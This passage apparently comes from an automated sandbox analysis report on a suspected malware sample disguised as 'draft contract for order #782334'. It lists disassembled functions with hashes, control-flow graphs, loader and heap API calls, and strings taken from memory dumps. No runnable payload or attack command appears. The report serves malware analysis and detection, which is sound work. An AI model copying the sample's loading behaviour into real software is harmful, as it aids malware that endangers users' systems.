                                                                                                                        • Instruction ID: 81410ffb0874c72c9f82fd140613efc6d021da64afe04e32bc0b3bf2b0fa7c57
                                                                                                                        • Opcode Fuzzy Hash: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                        • Instruction Fuzzy Hash: 16E04F362102147BD510FA5ADC01F9B779CEFC5714F40841AFA0967141C674B90287B5
                                                                                                                        Function 01742B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: bcaa65071f60dff3365f4bea986bdab5fe09d35b13606f4c1cecdbe86b2b5f78
                                                                                                                        • Instruction ID: 7abe4184fa686f7f5455c3c33466152b3cc673b8a26a15b33b6be8058f1e03f8
                                                                                                                        • Opcode Fuzzy Hash: bcaa65071f60dff3365f4bea986bdab5fe09d35b13606f4c1cecdbe86b2b5f78
                                                                                                                        • Instruction Fuzzy Hash: F890026120640003434571594414616800A97E0201B55C031F50145A0DC5758A916626
                                                                                                                        Function 01742DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 945009ba6845d8577895c033544c2791e1a0cfcf7e9234a5d362fcb25559eec7
                                                                                                                        • Instruction ID: 3b1ddb87a52168808ae43327f2463667d02743fe21dfa92b13464793af2054e6
                                                                                                                        • Opcode Fuzzy Hash: 945009ba6845d8577895c033544c2791e1a0cfcf7e9234a5d362fcb25559eec7
                                                                                                                        • Instruction Fuzzy Hash: C090023120540413D35171594504707400997D0241F95C422B4424568DD6A68B52A622
                                                                                                                        Function 01742C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 184b74c935527ad52cf5c16658590fd8caff6f7798e5a2dcf3432f310cfe8e50
                                                                                                                        • Instruction ID: 45dbff39234b14f64be5e7ae5c395754118e1d7706b0eab7d973c9a8e1980548
                                                                                                                        • Opcode Fuzzy Hash: 184b74c935527ad52cf5c16658590fd8caff6f7798e5a2dcf3432f310cfe8e50
                                                                                                                        • Instruction Fuzzy Hash: DD90023120548803D3507159840474A400597D0301F59C421B8424668DC6E58A917622
                                                                                                                        Function 017435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 4fb63c0ae15527ac315c5aebb841aa6a62acac13c0f88e6800584303c048b897
                                                                                                                        • Instruction ID: 3c45f9811f532cf6b4fb82707dff07d38880efc0048497073476681616091b32
                                                                                                                        • Opcode Fuzzy Hash: 4fb63c0ae15527ac315c5aebb841aa6a62acac13c0f88e6800584303c048b897
                                                                                                                        • Instruction Fuzzy Hash: 6E90023160950403D34071594514706500597D0201F65C421B4424578DC7E58B516AA3
                                                                                                                        Function 00413C33 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 0-1925500867
                                                                                                                        • Opcode ID: 47fd9a5721cc2d41a5d329880407fccc8c7e371088a6e8040ee7adad596fcbe3
                                                                                                                        • Instruction ID: 9f2dfacd246ee8138d91af8e826e1c003297ad8ed14319375169a2c205286367
                                                                                                                        • Opcode Fuzzy Hash: 47fd9a5721cc2d41a5d329880407fccc8c7e371088a6e8040ee7adad596fcbe3
                                                                                                                        • Instruction Fuzzy Hash: 2B51FE72A04209BFDB119B758C419EFBBBCEF82329B04466EF801A7141E7399E46C7D5
                                                                                                                        Function 00413D62 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 53 413d62-413d7f 54 413d81-413d8c 53->54 55 413d39-413d46 53->55 56 413de0-413e3d call 42e4c3 call 42eed3 call 417513 call 404833 call 424bb3 54->56 57 413d8e-413dbb 54->57 58 413d48-413d5d 55->58 59 413dbc 55->59 72 413e5d-413e63 56->72 73 413e3f-413e4e PostThreadMessageW 56->73 57->59 60 413dd5-413dde 58->60 61 413d5f-413d60 58->61 59->60 60->56 73->72 74 413e50-413e5a 73->74 74->72
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00413E4A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 1836367815-1925500867
                                                                                                                        • Opcode ID: 38547fadd0eeb1eca0ba56dcc328b3be3d801d245743f710302a858c74a72467
                                                                                                                        • Instruction ID: 88cd156cdc9bf9b18ebb48484415958f0fac3f013be3a7e7569fbb57ecce6a41
                                                                                                                        • Opcode Fuzzy Hash: 38547fadd0eeb1eca0ba56dcc328b3be3d801d245743f710302a858c74a72467
                                                                                                                        • Instruction Fuzzy Hash: DE31CE72A483487EDF21DAA58C41DDF3BADDE95364F04485EF510AB241D32D8E0347A6
                                                                                                                        Function 00413DD3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00413E4A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 1836367815-1925500867
                                                                                                                        • Opcode ID: 140a2741ae280e9859cdea08e10dafceb9e85a622853fca8a359ac55319e03f6
                                                                                                                        • Instruction ID: df9020fcaebf28c8a9af020bf3ba02eab6247f42d2229073ab61c7992f18581a
                                                                                                                        • Opcode Fuzzy Hash: 140a2741ae280e9859cdea08e10dafceb9e85a622853fca8a359ac55319e03f6
                                                                                                                        • Instruction Fuzzy Hash: 6401C871D4021C7ADB10AAE29C81DEF7B7CDF41798F008069FA14A7141D6784E0647A5
                                                                                                                        Function 004175B8 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 345 4175b8-4175bf 346 4175c0-4175c6 345->346 347 4175c7-4175ca 346->347 348 4175cb-4175ce 347->348 349 4175fa 347->349 350 4175cf-4175df 348->350 351 4175fc-417617 349->351 352 41758f-41759d call 42dac3 349->352 356 4175eb-4175f6 350->356 351->346 354 417619-417622 351->354 366 417573-417587 LdrLoadDll 352->366 367 41758a-41758d 352->367 357 417624-417632 354->357 358 41764b-41766d 354->358 356->350 361 4175f8-4175f9 356->361 357->356 362 417634-417636 357->362 359 41766e-417671 358->359 361->349 362->359 364 417638 362->364 364->347 365 41763a-417649 364->365 365->358 368 417672-41767e 365->368 366->367 370 417680-417683 368->370 371 417684-41769b call 42f063 368->371 374 41769d-4176ce call 42f063 call 42b2f3 371->374 375 4176cf-4176ef call 42b2f3 371->375
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 97e9fc485e406106bfb65abad72d185b67487cc7268d4b5fcd9bf310d2ef2faa
                                                                                                                        • Instruction ID: e7387a0c6b8900ed921e961252f047a28a00ebb33bb56b31a01300c40c371c6c
                                                                                                                        • Opcode Fuzzy Hash: 97e9fc485e406106bfb65abad72d185b67487cc7268d4b5fcd9bf310d2ef2faa
                                                                                                                        • Instruction Fuzzy Hash: 0E415C71A49208ABDB11CF68DC82FFA7BB8FF05314F0441AAE9049A641EA39D541CBD5
                                                                                                                        Function 00417506 Relevance: 1.6, APIs: 1, Instructions: 52libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 382 417506-41750d 383 417547-417558 call 42f8a3 382->383 384 41750f-41753c call 42f003 382->384 388 41755d 383->388 389 417542-417550 call 42f603 384->389 390 41753e-417541 384->390 391 417560-417571 call 42dac3 388->391 389->391 396 417552-417557 389->396 397 417573-417587 LdrLoadDll 391->397 398 41758a-41758d 391->398 396->388 399 417558 call 42f8a3 396->399 397->398 399->388
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: fec0760840a81a1cfc29dba25679e0d068e121a6b38d6e3e87c4cfae0b4f1189
                                                                                                                        • Instruction ID: ea26a29338aa88d0d3be55b1328603ceb0725f054a43c19a13f69edbc7379230
                                                                                                                        • Opcode Fuzzy Hash: fec0760840a81a1cfc29dba25679e0d068e121a6b38d6e3e87c4cfae0b4f1189
                                                                                                                        • Instruction Fuzzy Hash: D3019EB1E4410DA7DB10EBA4ED42FDEB7B89B44308F4082AAE91DA7240F235DB188795
                                                                                                                        Function 0041758F Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 415 41758f-41759d call 42dac3 420 417573-417587 LdrLoadDll 415->420 421 41758a-41758d 415->421 420->421
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: faa19c80f4feba2061a74ca3ae79c91efa0461eacaa1439af41494dbf367e914
                                                                                                                        • Instruction ID: ede1850716ebb422ed3c2535a29876ab67790654861e795397d75b07a85b4bc4
                                                                                                                        • Opcode Fuzzy Hash: faa19c80f4feba2061a74ca3ae79c91efa0461eacaa1439af41494dbf367e914
                                                                                                                        • Instruction Fuzzy Hash: 31F0A0B5E0410DBBDB00CA95DC41FEEBB78EF45318F1082A9E90896200E3359A168B91
                                                                                                                        Function 00417593 Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 422 417593-41759d call 42dac3 427 417573-417587 LdrLoadDll 422->427 428 41758a-41758d 422->428 427->428
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: af889453b085852eccb278b9c7a2561df7d0aadd69b1b6e10842e4ddd5654ea4
                                                                                                                        • Instruction ID: bbefeecb9fbd67132910372d0dc99fec3dc364757f9caa88d0980819f192cd57
                                                                                                                        • Opcode Fuzzy Hash: af889453b085852eccb278b9c7a2561df7d0aadd69b1b6e10842e4ddd5654ea4
                                                                                                                        • Instruction Fuzzy Hash: 5FF030B5D0410DBBDB00DA99DC42FABB7B8DB45208F108195F90896240F634EA558BD5
                                                                                                                        Function 0042C6D3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BFC4589,00000007,00000000,00000004,00000000,00416DF9,000000F4), ref: 0042C712
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                        • Instruction ID: f5cc48ef50bcaa2af9ee5250c1fd3c21de1d36627e9c3385dc6ab60d9e539dbf
                                                                                                                        • Opcode Fuzzy Hash: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                        • Instruction Fuzzy Hash: 47E06DB2600208BBDA10EE59DC41EAB37ACDFC5714F004419F908A7242C670B9118AB8
                                                                                                                        Function 0042C683 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 429 42c683-42c6c7 call 4048c3 call 42d5c3 RtlAllocateHeap
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(?,0041E2E4,?,?,00000000,?,0041E2E4,?,?,?), ref: 0042C6C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                        • Instruction ID: 26b6d175563219739d72d54b8956cc6bc6576853ca31bdfc4a179138117d8d4e
                                                                                                                        • Opcode Fuzzy Hash: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                        • Instruction Fuzzy Hash: E0E06DB66003087BD610EE5ADC45E9B37ACEFC5714F004419FA08A7241D670B9118BB8
                                                                                                                        Function 0042C723 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,E39CA3BE,?,?,E39CA3BE), ref: 0042C75A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 2acd5a490768c9832618ef1d028958695b71c0fca5973a16c1d19e88c75f900a
                                                                                                                        • Instruction ID: 907eb8c69ca37f2eb879960a4b276426f7e41c6fb7599df7476c68977caa0473
                                                                                                                        • Opcode Fuzzy Hash: 2acd5a490768c9832618ef1d028958695b71c0fca5973a16c1d19e88c75f900a
                                                                                                                        • Instruction Fuzzy Hash: 3EE08636210618BBD610FB6ADC11F97775CDFC5714F404429FA0867242C6B4BA118BF4
                                                                                                                        Function 01742C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: c0d487c8febd6bf47e4aa1beac6d09340370d64adda86dba9d79105c0fce94c9
                                                                                                                        • Instruction ID: 4120f5aa1f13cdcfec93cfaf7f7068f83afa9ed5482b727c8ca21a76aa83ee9d
                                                                                                                        • Opcode Fuzzy Hash: c0d487c8febd6bf47e4aa1beac6d09340370d64adda86dba9d79105c0fce94c9
                                                                                                                        • Instruction Fuzzy Hash: 26B09B719055C5C7DB51E7645608717B90077D0701F15C071F2030651F4778C1D1E676

                                                                                                                        Non-executed Functions

                                                                                                                        Function 01782349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-2160512332
                                                                                                                        • Opcode ID: 192a0d4030ce1d9d48c27f2531059ec41d6bd3e56db3089087ce38cec885852c
                                                                                                                        • Instruction ID: 22144fbeb7ea1effe99ef5467077377cb3e7f5df00490164185197bc76899a88
                                                                                                                        • Opcode Fuzzy Hash: 192a0d4030ce1d9d48c27f2531059ec41d6bd3e56db3089087ce38cec885852c
                                                                                                                        • Instruction Fuzzy Hash: 2B92AE71688342AFE721EF19C884B6BFBE8BB84711F04491DFA95D7292D770E844CB52
                                                                                                                        Function 01738620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Thread identifier, xrefs: 0177553A
                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01775543
                                                                                                                        • Address of the debug info found in the active list., xrefs: 017754AE, 017754FA
                                                                                                                        • undeleted critical section in freed memory, xrefs: 0177542B
                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0177540A, 01775496, 01775519
                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017754CE
                                                                                                                        • 8, xrefs: 017752E3
                                                                                                                        • Critical section address., xrefs: 01775502
                                                                                                                        • double initialized or corrupted critical section, xrefs: 01775508
                                                                                                                        • Invalid debug info address of this critical section, xrefs: 017754B6
                                                                                                                        • corrupted critical section, xrefs: 017754C2
                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017754E2
                                                                                                                        • Critical section address, xrefs: 01775425, 017754BC, 01775534
                                                                                                                        • Critical section debug info address, xrefs: 0177541F, 0177552E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                        • API String ID: 0-2368682639
                                                                                                                        • Opcode ID: fe7728f141afb6a7b837fa7c85cc45c2cfe75ffce9fd41eb0f42c60f109e265a
                                                                                                                        • Instruction ID: bafe6f8826c1a32e7dad4c35f5596200912477f8b98df7d34398c4f5bd4d999d
                                                                                                                        • Opcode Fuzzy Hash: fe7728f141afb6a7b837fa7c85cc45c2cfe75ffce9fd41eb0f42c60f109e265a
                                                                                                                        • Instruction Fuzzy Hash: 8E8167B1A01358EADB20CB99CC48BAEFBB9EB48714F244259F505B7291D375A940CB60
                                                                                                                        Function 017329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01772409
                                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01772412
                                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0177261F
                                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017724C0
                                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01772602
                                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01772624
                                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017722E4
                                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017725EB
                                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01772498
                                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01772506
                                                                                                                        • @, xrefs: 0177259B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                        • API String ID: 0-4009184096
                                                                                                                        • Opcode ID: 49571885eec130a00ad376f819570a319c205faa7b74f2ace7aba778167f403b
                                                                                                                        • Instruction ID: 209e66f29b2a47a94a3d12adfaa8a4192a0fb3e74b26f569f4ab25df939ec84b
                                                                                                                        • Opcode Fuzzy Hash: 49571885eec130a00ad376f819570a319c205faa7b74f2ace7aba778167f403b
                                                                                                                        • Instruction Fuzzy Hash: 4E025FF1D042299BDF21DB54CC84B9AF7B8AB54714F0041EAE619A7243EB309F84CF99
                                                                                                                        Function 017A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                        • API String ID: 0-2515994595
                                                                                                                        • Opcode ID: c7f06f528127b01df916302cb5b1d64afe2d02d72a471deb46c94b9cc49718bf
                                                                                                                        • Instruction ID: fc54804f5ac63a9fad4e4ae3019f31109fe5bab0d9014b257b2650179d306853
                                                                                                                        • Opcode Fuzzy Hash: c7f06f528127b01df916302cb5b1d64afe2d02d72a471deb46c94b9cc49718bf
                                                                                                                        • Instruction Fuzzy Hash: F251C0715043119BC329DF288848BABFBE8EFD8255F944A6DE999C3241E770D644CBD3
                                                                                                                        Function 017B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
